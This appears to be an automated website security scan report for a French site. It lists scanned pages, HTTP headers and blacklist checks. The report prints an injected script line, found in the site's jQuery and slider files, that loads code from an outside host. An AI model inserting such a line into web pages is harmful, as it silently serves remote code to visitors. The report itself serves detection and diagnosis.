Scanned pages/files
Request | Server response | Status |
http://citadelleenbordees.fr/ | 200 OK Content-Length: 12750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#coin-slider').coinslider({ width: 1000, height: 260, spw: 1,sph: 1,navigation: true, delay: 5000 }); }); Antivirus reports:
| ||
http://citadelleenbordees.fr/include/jquery-1.9.1.min.js | 200 OK Content-Length: 93156 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pedagogprof.com/clik.php?id="></script>'); | ||
http://citadelleenbordees.fr/include/coin-slider.min.js | 200 OK Content-Length: 8970 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pedagogprof.com/clik.php?id="></script>'); | ||
http://citadelleenbordees.fr/index.php?PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 12750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#coin-slider').coinslider({ width: 1000, height: 260, spw: 1,sph: 1,navigation: true, delay: 5000 }); }); Antivirus reports:
| ||
http://citadelleenbordees.fr/index.php?page=prog&PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 26058 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=archive&PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 3779 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=partenaire&PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 3443 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=contact&PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 5438 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=conn&PHPSESSID=5aa94b320effa104e89f8132736c1b8c | 200 OK Content-Length: 4363 Content-Type: text/html | clean |
http://citadelleenbordees.fr/test404page.js | 404 Not Found Content-Length: 12750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#coin-slider').coinslider({ width: 1000, height: 260, spw: 1,sph: 1,navigation: true, delay: 5000 }); }); Antivirus reports:
| ||
http://citadelleenbordees.fr/index.php?PHPSESSID=e00de17e760a88e04f57525b9d56e6d7 | 200 OK Content-Length: 12750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#coin-slider').coinslider({ width: 1000, height: 260, spw: 1,sph: 1,navigation: true, delay: 5000 }); }); Antivirus reports:
| ||
http://citadelleenbordees.fr/index.php?page=prog&PHPSESSID=e00de17e760a88e04f57525b9d56e6d7 | 200 OK Content-Length: 26058 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=archive&PHPSESSID=e00de17e760a88e04f57525b9d56e6d7 | 200 OK Content-Length: 3779 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=partenaire&PHPSESSID=e00de17e760a88e04f57525b9d56e6d7 | 200 OK Content-Length: 3443 Content-Type: text/html | clean |
http://citadelleenbordees.fr/index.php?page=contact&PHPSESSID=e00de17e760a88e04f57525b9d56e6d7 | 200 OK Content-Length: 5438 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: citadelleenbordees.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 13 Jun 2014 03:11:05 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: 90planBAK=R698937404; path=/; expires=Fri, 13-Jun-2014 04:29:14 GMT
Set-Cookie: 90plan=R1561091643; path=/; expires=Fri, 13-Jun-2014 04:15:33 GMT
Set-Cookie: PHPSESSID=5aa94b320effa104e89f8132736c1b8c; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: citadelleenbordees.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 13 Jun 2014 03:11:05 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: 90planBAK=R698937404; path=/; expires=Fri, 13-Jun-2014 04:29:14 GMT
Set-Cookie: 90plan=R1561091643; path=/; expires=Fri, 13-Jun-2014 04:15:33 GMT
Set-Cookie: PHPSESSID=5aa94b320effa104e89f8132736c1b8c; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: citadelleenbordees.fr
Referer: http://www.google.com/search?q=citadelleenbordees.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: citadelleenbordees.fr
Referer: http://www.google.com/search?q=citadelleenbordees.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=citadelleenbordees.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://citadelleenbordees.fr/
Result: citadelleenbordees.fr is not infected or malware details are not published yet.
Result: citadelleenbordees.fr is not infected or malware details are not published yet.